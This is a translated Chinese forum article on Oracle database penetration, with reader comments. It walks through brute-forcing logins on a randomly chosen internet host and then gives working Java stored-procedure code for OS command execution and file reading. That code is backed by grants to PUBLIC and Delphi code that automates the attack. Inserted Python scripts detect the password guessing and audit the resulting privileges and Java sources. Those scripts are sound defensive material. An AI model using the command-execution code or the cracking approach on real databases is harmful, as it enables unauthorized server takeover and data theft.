A Brief Analysis of Oracle Database Penetration Techniques

Text and images: Zhao Xianyang (http://www.isafe.cc)
Oracle database overview
Oracle is a database system similar to MS SQL Server. Besides SQL it supports Ada programming and Java code, and it runs on Windows, Linux and other operating systems. This article looks at how an Oracle database system is penetrated. Oracle has had many weaknesses: default passwords on the DBSNMP account, SID enumeration on older versions, local privilege escalation, SQL injection in certain built-in functions, buffer overflows, and so on. Below we first crack an Oracle login account and then use a Delphi program to execute arbitrary commands on the database server.
Cracking Oracle database accounts
Cracking here is nothing more than brute force: trying passwords until a login succeeds. A wordlist is needed first, and the wordlist is decisive for the result. The tool used is the 【河马】Oracle数据库审计工具 (Hippo Oracle Database Audit Tool), an Oracle auditing tool produced by 河马安全网 (Hippo Security); its main window is shown in Figure 1.

Figure 1
We pick an arbitrary Oracle system on the internet. How to find one: check whether port 1521 is open; if it is, the server is most likely running Oracle (1521 is the default listener port). We take 202.107.*.* as the test target, as shown in Figure 2 (cracking the password).

Figure 2
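The password guessing shown above leaves a trail on the database side. As an added example (not part of the original article and not code from the Hippo tool), the Python check below scans Oracle audit-trail rows for bursts of failed logons from one client host and notes whether a successful logon followed. It assumes failed logons are being audited (AUDIT SESSION WHENEVER NOT SUCCESSFUL), so that they appear in DBA_AUDIT_TRAIL as ACTION_NAME 'LOGON' with RETURNCODE 1017 (ORA-01017); the rows, hosts and user names are constructed.

```python
# Added example, not from the original article: spot password guessing against an
# Oracle instance from its audit trail. Assumes failed logons are audited
# (AUDIT SESSION WHENEVER NOT SUCCESSFUL), so they appear in DBA_AUDIT_TRAIL as
# ACTION_NAME = 'LOGON' with RETURNCODE = 1017 (ORA-01017). All rows are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

ORA_INVALID_CREDENTIALS = 1017  # ORA-01017: invalid username/password; logon denied

# Constructed rows in the shape of DBA_AUDIT_TRAIL:
# (USERNAME, USERHOST, ACTION_NAME, RETURNCODE, TIMESTAMP)
SAMPLE_AUDIT_ROWS = [
    ("SYSTEM",  "10.0.0.5", "LOGON",  1017, "2014-12-01 10:00:01"),
    ("SYSTEM",  "10.0.0.5", "LOGON",  1017, "2014-12-01 10:00:02"),
    ("DBSNMP",  "10.0.0.5", "LOGON",  1017, "2014-12-01 10:00:03"),
    ("DBSNMP",  "10.0.0.5", "LOGON",  1017, "2014-12-01 10:00:04"),
    ("SCOTT",   "10.0.0.5", "LOGON",  1017, "2014-12-01 10:00:05"),
    ("SYSTEM",  "10.0.0.5", "LOGON",  1017, "2014-12-01 10:00:06"),
    ("SYSTEM",  "10.0.0.5", "LOGON",  0,    "2014-12-01 10:00:40"),  # a guess that worked
    ("APPUSER", "10.0.0.9", "LOGON",  1017, "2014-12-01 10:05:00"),  # a single typo
    ("APPUSER", "10.0.0.9", "LOGON",  0,    "2014-12-01 10:05:10"),
    ("APPUSER", "10.0.0.9", "SELECT", 0,    "2014-12-01 10:05:12"),
]


def parse_rows(rows):
    """Turn raw audit tuples into dicts with a real datetime for the timestamp."""
    return [
        {"user": u, "host": h, "action": a, "rc": rc,
         "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")}
        for u, h, a, rc, ts in rows
    ]


def find_guessing(rows, window_seconds=300, threshold=5):
    """Report client hosts with at least `threshold` failed logons inside any
    window of `window_seconds`, which users they tried, and whether a logon
    from the same host succeeded after the burst."""
    window = timedelta(seconds=window_seconds)
    failures, successes = defaultdict(list), defaultdict(list)
    for r in parse_rows(rows):
        if r["action"] != "LOGON":
            continue
        if r["rc"] == ORA_INVALID_CREDENTIALS:
            failures[r["host"]].append(r)
        elif r["rc"] == 0:
            successes[r["host"]].append(r)

    findings = []
    for host, fails in failures.items():
        fails.sort(key=lambda r: r["ts"])
        # Sliding window over the sorted failures: size of the largest burst.
        best, start = 0, 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        last_fail = fails[-1]["ts"]
        findings.append({
            "host": host,
            "failures": best,
            "users": sorted({f["user"] for f in fails}),
            "first": fails[0]["ts"],
            "last": last_fail,
            # A success from the same host after the burst is the case worth paging on.
            "succeeded_after": any(s["ts"] >= last_fail for s in successes[host]),
        })
    return findings


if __name__ == "__main__":
    for f in find_guessing(SAMPLE_AUDIT_ROWS):
        print(f"{f['host']}: {f['failures']} failed logons for {f['users']} "
              f"between {f['first']} and {f['last']}; "
              f"succeeded afterwards: {f['succeeded_after']}")
```

On a live system the rows would come from a query such as `SELECT username, userhost, action_name, returncode, timestamp FROM dba_audit_trail WHERE action_name = 'LOGON'`; the window and threshold are tuning knobs, and the `succeeded_after` flag separates noisy misconfigured clients from a guess that actually landed.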
Executing arbitrary commands through the Oracle database
We use Delphi's ODAC component to implement command execution. Command execution works by creating a Java function that runs OS commands. Look at the version 1 code first. This code has a flaw: in a SQL window it returns no output (the same holds under ODAC), whereas in sqlplus the output is returned. Here is the code:

    -- Create Java source www_isafe_cc_Util
    create or replace and compile
      java source named "www_isafe_cc_Util"
      as
      import java.io.*;
      import java.lang.*;
      public class www_isafe_cc_Util extends Object
      {
        public static int RunThis(String args)
        {
          Runtime rt = Runtime.getRuntime();
          int rc = -1;
          try
          {
            Process p = rt.exec(args);
            int bufSize = 4096;
            BufferedInputStream bis =
              new BufferedInputStream(p.getInputStream(), bufSize);
            int len;
            byte buffer[] = new byte[bufSize];
            // Echo back what the program spit out
            while ((len = bis.read(buffer, 0, bufSize)) != -1)
              System.out.write(buffer, 0, len);
            rc = p.waitFor();
          }
          catch (Exception e)
          {
            e.printStackTrace();
            rc = -1;
          }
          finally
          {
            return rc;
          }
        }
      }
    /

    Java created.

    -- Create function www_isafe_cc_RUN_CMD
    create or replace
    function www_isafe_cc_RUN_CMD(p_cmd in varchar2) return number
    as
    language java
    name 'www_isafe_cc_Util.RunThis(java.lang.String) return integer';
    /
    Function created.

    -- Create a procedure that calls the function
    create or replace procedure RC(p_cmd in varchar2)
    as
      x number;
    begin
      x := www_isafe_cc_run_cmd(p_cmd);
    end;
    /

Invoking it in sqlplus
    variable x number;
    set serveroutput on
    exec dbms_java.set_output(100000);
    grant javasyspriv to system;
    grant javauserpriv to system;
    exec :x := www_isafe_cc_RUN_CMD('ipconfig');
See Figures 2 and 3.

Figure 2

Figure 3
But it cannot be run from a SQL window. A SQL window and the command window of sqlplus differ, and Delphi's ODAC component executes in SQL-window fashion. I searched a lot of material online without finding a solution; later I changed the Java code so that the command output is returned when run through the ODAC component. That code is called version 2 and follows below.
Create Java source www_isafe_cc_Util

    create or replace and compile java source named "www_isafe_cc_Util" as
    import java.io.*;
    public class www_isafe_cc_Util extends Object {
      public static String runCMD(String args) {
        try {
          BufferedReader myReader = new BufferedReader(
            new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
          String stemp, str = "";
          while ((stemp = myReader.readLine()) != null)
            str += stemp + "\n";
          myReader.close();
          return str;
        } catch (Exception e) {
          return e.toString();
        }
      }
      public static String readFile(String filename) {
        try {
          BufferedReader myReader = new BufferedReader(new FileReader(filename));
          String stemp, str = "";
          while ((stemp = myReader.readLine()) != null)
            str += stemp + "\n";
          myReader.close();
          return str;
        } catch (Exception e) {
          return e.toString();
        }
      }
    }

Create the calling function www_isafe_cc_RunCMD

    create or replace function www_isafe_cc_RunCMD(p_cmd in varchar2) return varchar2
      as language java
      name 'www_isafe_cc_Util.runCMD(java.lang.String) return String';

Grant execute permission

    begin
      dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '>', 'execute');
    end;

  
                                  
Figure 4
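Before the client-side code, a defender's view of what the preceding steps leave behind. The Java source, the wrapper function, the JAVASYSPRIV/JAVAUSERPRIV grants and the dbms_java.grant_permission calls are all recorded in the data dictionary, so they can be audited. The Python script below is an added example, not code from the article or from the Hippo tool: it runs offline over constructed rows shaped like three Oracle views that do exist (DBA_ROLE_PRIVS, DBA_JAVA_POLICY and DBA_SOURCE, which lists stored Java sources with TYPE 'JAVA SOURCE') and flags the three footholds the text creates. The grantees, schema names and the Greeter/RC objects are constructed; the www_isafe_cc_Util text mirrors the version 2 class above.

```python
# Added example, not from the original article: an offline audit for the foothold
# the text describes, a Java stored procedure that reaches the OS or the file system.
# DBA_ROLE_PRIVS, DBA_JAVA_POLICY and DBA_SOURCE are real Oracle views; every row
# below is constructed sample data shaped like them, not output from any database.
import re
from collections import defaultdict

# Roles the article grants so that the Java code may touch the OS.
JAVA_OS_ROLES = {"JAVASYSPRIV", "JAVAUSERPRIV"}

# Constructed DBA_ROLE_PRIVS rows: (GRANTEE, GRANTED_ROLE)
SAMPLE_ROLE_PRIVS = [
    ("SYSTEM", "JAVASYSPRIV"),
    ("SYSTEM", "JAVAUSERPRIV"),
    ("APPADMIN", "DBA"),
    ("REPORTING", "CONNECT"),
]

# Constructed DBA_JAVA_POLICY rows; the PUBLIC FilePermission entries mirror the text's grants.
SAMPLE_JAVA_POLICY = [
    {"KIND": "GRANT", "GRANTEE": "PUBLIC", "TYPE_NAME": "java.io.FilePermission",
     "NAME": ">", "ACTION": "execute", "ENABLED": "ENABLED"},
    {"KIND": "GRANT", "GRANTEE": "PUBLIC", "TYPE_NAME": "java.io.FilePermission",
     "NAME": ">", "ACTION": "read", "ENABLED": "ENABLED"},
    {"KIND": "GRANT", "GRANTEE": "PUBLIC", "TYPE_NAME": "java.util.PropertyPermission",
     "NAME": "*", "ACTION": "read", "ENABLED": "ENABLED"},
    {"KIND": "GRANT", "GRANTEE": "ETL", "TYPE_NAME": "java.io.FilePermission",
     "NAME": "/data/in/*", "ACTION": "read", "ENABLED": "ENABLED"},
]

# Constructed DBA_SOURCE rows: (OWNER, NAME, TYPE, LINE, TEXT). The first object is the
# article's version-2 class split into lines; Greeter is a harmless control; RC is PL/SQL.
U = ("SYSTEM", "www_isafe_cc_Util", "JAVA SOURCE")
SAMPLE_SOURCE = [
    U + (1, "import java.io.*;\n"),
    U + (2, "public class www_isafe_cc_Util extends Object {\n"),
    U + (3, "  public static String runCMD(String args) {\n"),
    U + (4, "    try { BufferedReader myReader = new BufferedReader(new InputStreamReader(\n"),
    U + (5, "        Runtime.getRuntime().exec(args).getInputStream())); return \"\"; }\n"),
    U + (6, "    catch (Exception e) { return e.toString(); } }\n"),
    U + (7, "  public static String readFile(String filename) {\n"),
    U + (8, "    try { BufferedReader myReader = new BufferedReader(new FileReader(filename)); return \"\"; }\n"),
    U + (9, "    catch (Exception e) { return e.toString(); } } }\n"),
    ("APP", "Greeter", "JAVA SOURCE", 1, "public class Greeter { static String hi(String n) { return \"hi \" + n; } }\n"),
    ("APP", "RC", "PROCEDURE", 1, "procedure RC(p_cmd in varchar2) as x number; begin x := 0; end;\n"),
]

# Source patterns that mean a stored Java class can run programs or touch files.
OS_REACH_PATTERNS = {
    "runtime_exec": re.compile(r"Runtime\.getRuntime\(\)\s*\.exec\s*\("),
    "process_builder": re.compile(r"\bProcessBuilder\b"),
    "file_read": re.compile(r"\bnew\s+(FileReader|FileInputStream)\s*\("),
    "file_write": re.compile(r"\bnew\s+(FileWriter|FileOutputStream)\s*\("),
}


def unexpected_java_roles(role_rows, baseline=frozenset()):
    """Grantees holding JAVASYSPRIV/JAVAUSERPRIV that are not on the approved baseline."""
    return sorted((g, r) for g, r in role_rows if r in JAVA_OS_ROLES and g not in baseline)


def public_file_permissions(policy_rows):
    """Enabled java.io.FilePermission grants to PUBLIC; execute/write are rated high."""
    out = []
    for p in policy_rows:
        if (p["KIND"] == "GRANT" and p["GRANTEE"] == "PUBLIC" and p["ENABLED"] == "ENABLED"
                and p["TYPE_NAME"] == "java.io.FilePermission"):
            actions = {a.strip() for a in p["ACTION"].split(",")}
            severity = "high" if actions & {"execute", "write"} else "medium"
            out.append((p["NAME"], p["ACTION"], severity))
    return out


def java_sources_reaching_os(source_rows):
    """Stored Java sources whose text matches OS/file-access patterns, with indicators."""
    text_by_obj = defaultdict(list)
    for owner, name, typ, line, text in source_rows:
        if typ == "JAVA SOURCE":
            text_by_obj[(owner, name)].append((line, text))
    findings = {}
    for key, lines in text_by_obj.items():
        body = "".join(t for _, t in sorted(lines))  # reassemble in LINE order
        hits = sorted(n for n, rx in OS_REACH_PATTERNS.items() if rx.search(body))
        if hits:
            findings[key] = hits
    return findings


if __name__ == "__main__":
    print("java roles:", unexpected_java_roles(SAMPLE_ROLE_PRIVS))
    print("PUBLIC file permissions:", public_file_permissions(SAMPLE_JAVA_POLICY))
    print("java sources reaching the OS:", java_sources_reaching_os(SAMPLE_SOURCE))
```

Each function takes the rows of one view, so the same code runs against a real export of those views; the baseline parameter lets a DBA whitelist accounts that legitimately hold the Java roles, and anything else, together with any FilePermission granted to PUBLIC, is what the article's steps look like from the dictionary side.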
The command executed successfully and its result was returned. The other functions, such as reading files and listing directories, use much the same code, so let's leave it there. Here is the key Delphi code for executing commands:

    procedure TfrmMain.btnCreateFunClick(Sender: TObject);
    var
      ConnStr: string;
      StrSQL, StrSQL2: string;
    begin
      btnCreateFun.Enabled := False;
      try
        try
          // ConnStr is built but not used below; the direct-mode session carries the credentials
          ConnStr := Format('%s/%s@%s', [edtUser.Text, edtPass.Text, edtSid.Text, edtHost.Text]);
          oraSession1.Options.Direct := True;
          oraSession1.Server := edtHost.Text;
          oraSession1.Username := edtUser.Text;
          oraSession1.Password := edtPass.Text;
          oraQuery1.Connection := oraSession1;
          if oraQuery1.Active then
            oraQuery1.Active := False;
          oraQuery1.SQL.Clear;
          //oraQuery1.SQL.Text := 'select * from v$version';
          oraQuery1.SQL.Text := MemoPack.Lines.Text;
          oraQuery1.Execute;
          Memo1.Lines.Add('包已建立');   // 'Package created'
          while not oraQuery1.Eof do
          begin
            Memo1.Lines.Add(oraQuery1.Fields[0].AsString);
            oraQuery1.Next;
          end;
          if oraQuery1.Active then
            oraQuery1.Active := False;
          oraQuery1.SQL.Clear;
          oraQuery1.SQL.Text := MemoFunc.Lines.Text;
          oraQuery1.Execute;
          Memo1.Lines.Add('函数已建立');   // 'Function created'
          while not oraQuery1.Eof do
          begin
            Memo1.Lines.Add(oraQuery1.Fields[0].AsString);
            oraQuery1.Next;
          end;
          if oraQuery1.Active then
            oraQuery1.Active := False;
          oraQuery1.SQL.Clear;
          oraQuery1.SQL.Text := MemoProc.Lines.Text;
          oraQuery1.Execute;
          Memo1.Lines.Add('过程已建立');   // 'Procedure created'
          while not oraQuery1.Eof do
          begin
            Memo1.Lines.Add(oraQuery1.Fields[0].AsString);
            oraQuery1.Next;
          end;
          // Grant the Java file permissions to PUBLIC: execute (StrSQL2) and read (StrSQL)
          StrSQL2 := 'begin dbms_java.grant_permission( ''PUBLIC'', ''SYS:java.io.FilePermission'', ''>'', ''execute'');end;';
          StrSQL := 'begin dbms_java.grant_permission(''PUBLIC'', ''SYS:java.io.FilePermission'', ''>'', ''read'');end;';

          if oraQuery1.Active then
            oraQuery1.Active := False;
          oraQuery1.SQL.Clear;
          oraQuery1.SQL.Add(StrSQL);
          oraQuery1.ExecSQL;
          Memo1.Lines.Add('赋予权限');   // 'Permission granted'
          if oraQuery1.Active then
            oraQuery1.Active := False;
          oraQuery1.SQL.Clear;
          oraQuery1.SQL.Add(StrSQL2);
          oraQuery1.ExecSQL;
          Memo1.Lines.Add('赋予权限');   // 'Permission granted'
          ListFolderJavaSource;
          Memo1.Lines.Add('列目录');   // 'Directory listed'
        except
          on e: Exception do
          begin
            ShowMessage(e.Message);
          end;
        end;
      finally
      end;
      btnCreateFun.Enabled := True;
    end;

Summary
This article started from basic Oracle password cracking and went step by step to executing arbitrary commands on the server, finally taking control of the server system hosting the database.

[This entry was edited by admin on 2014-12-08 07:04 PM]
Source: original to this site
河马安全网 [2016-02-21 05:40 PM]
The SID and port can be configured in the Oracle client. You need to install the Oracle Enterprise Manager Console.
河马安全网 [2015-01-29 10:52 AM]
The problem you describe does exist; I have had a lot on my hands recently, so the improvement has been postponed.
pt007 [2015-01-26 12:09 AM]
This program has two problems: first, there is no input box for the Oracle database port; second, there is no input box for the SID connection string!